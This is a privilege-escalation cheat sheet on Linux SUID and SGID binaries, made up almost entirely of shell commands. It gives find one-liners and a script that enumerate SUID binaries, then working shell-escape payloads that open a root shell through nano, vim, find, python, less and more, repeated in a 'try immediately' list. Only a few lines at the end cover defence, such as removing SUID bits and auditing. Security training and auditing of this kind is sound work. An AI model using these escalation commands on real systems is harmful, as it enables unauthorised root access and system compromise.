SUID and SGID special permissions allow programs to execute with elevated privileges, providing potential privilege escalation vectors through vulnerable or misconfigured binaries.
- Symbol:
sin user execute position - Function: Execute program with owner's privileges
- Risk: If owner is root, program runs as root
- Symbol:
sin group execute position - Function: Execute program with group's privileges
- Risk: Inherit group permissions during execution
# SUID binaries (most common)
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
# Alternative format
find / -type f -perm -4000 -ls 2>/dev/null# SGID binaries
find / -user root -perm -2000 -exec ls -ldb {} \; 2>/dev/null
find / -perm -g=s -type f 2>/dev/null
# Both SUID and SGID
find / -user root -perm -6000 -exec ls -ldb {} \; 2>/dev/null# Typical paths to check
/bin/
/usr/bin/
/usr/local/bin/
/sbin/
/usr/sbin/
/usr/local/sbin/# Common exploitable SUID binaries
nano, vim, vi # Text editors
find # File finder
nmap # Network scanner
python, python3 # Interpreters
less, more # Pagers
tail, head # File readers
awk, sed # Text processors# Cross-reference found SUID binaries with GTFOBins
curl -s https://gtfobins.github.io/ | html2text | grep -E "^[a-z-]+$" | while read binary; do
if find / -name "$binary" -perm -4000 2>/dev/null | grep -q .; then
echo "SUID BINARY FOUND: $binary - Check GTFOBins!"
fi
done# If nano has SUID bit
nano
# In nano: Ctrl+R Ctrl+X
# Execute: reset; bash 1>&0 2>&0
# If vim has SUID bit
vim -c ':!/bin/bash'# If find has SUID bit
find . -exec /bin/bash \; -quit
find . -exec /bin/sh \; -quit# If python has SUID bit
python -c "import os; os.setuid(0); os.system('/bin/bash')"
python3 -c "import os; os.setuid(0); os.system('/bin/bash')"# If less has SUID bit
less /etc/passwd
# In less: !/bin/bash
# If more has SUID bit
more /etc/passwd
# In more: !/bin/bash# Analyze unknown SUID binary
file /path/to/suid_binary
strings /path/to/suid_binary
ltrace /path/to/suid_binary
strace /path/to/suid_binary# Check for library dependencies
ldd /path/to/suid_binary
# Find writable library paths
ldd /path/to/suid_binary | grep "=> /" | awk '{print $3}' | xargs ls -la#!/bin/bash
echo "=== SPECIAL PERMISSIONS ENUMERATION ==="
echo "[+] SUID binaries:"
find / -type f -perm -4000 2>/dev/null | head -20
echo "[+] SGID binaries:"
find / -type f -perm -2000 2>/dev/null | head -10
echo "[+] Both SUID and SGID:"
find / -type f -perm -6000 2>/dev/null
echo "[+] Custom SUID binaries (non-standard paths):"
find /home /opt /usr/local -type f -perm -4000 2>/dev/null
echo "[+] GTFOBins candidates:"
for binary in nano vim vi find python python3 less more tail head; do
if find / -name "$binary" -perm -4000 2>/dev/null | grep -q .; then
echo " SUID: $binary - CHECK GTFOBINS!"
fi
done# Check for common exploitable SUID binaries
find / -type f -perm -4000 2>/dev/null | grep -E "(nano|vim|vi|find|python|less|more|tail|head|awk|sed)"
# GTFOBins one-liner check
for i in $(find / -type f -perm -4000 2>/dev/null | xargs basename | sort -u); do echo "Check GTFOBins for: $i"; done# If you find these SUID, try immediately:
nano -> Ctrl+R Ctrl+X -> reset; bash 1>&0 2>&0
vim -> :!/bin/bash
find -> find . -exec /bin/bash \; -quit
python -> python -c "import os; os.setuid(0); os.system('/bin/bash')"
less -> !/bin/bash- Text editors (nano, vim) with SUID
- Interpreters (python, perl) with SUID
- File utilities (find, cp, mv) with SUID
- Custom applications in user directories
# Remove unnecessary SUID bits
chmod u-s /path/to/binary
# Audit SUID binaries regularly
find / -type f -perm -4000 -exec ls -la {} \; 2>/dev/null > suid_audit.txt
# Monitor for new SUID binariesSpecial permissions create powerful attack vectors - SUID and SGID bits can transform ordinary binaries into privilege escalation tools when combined with GTFOBins techniques.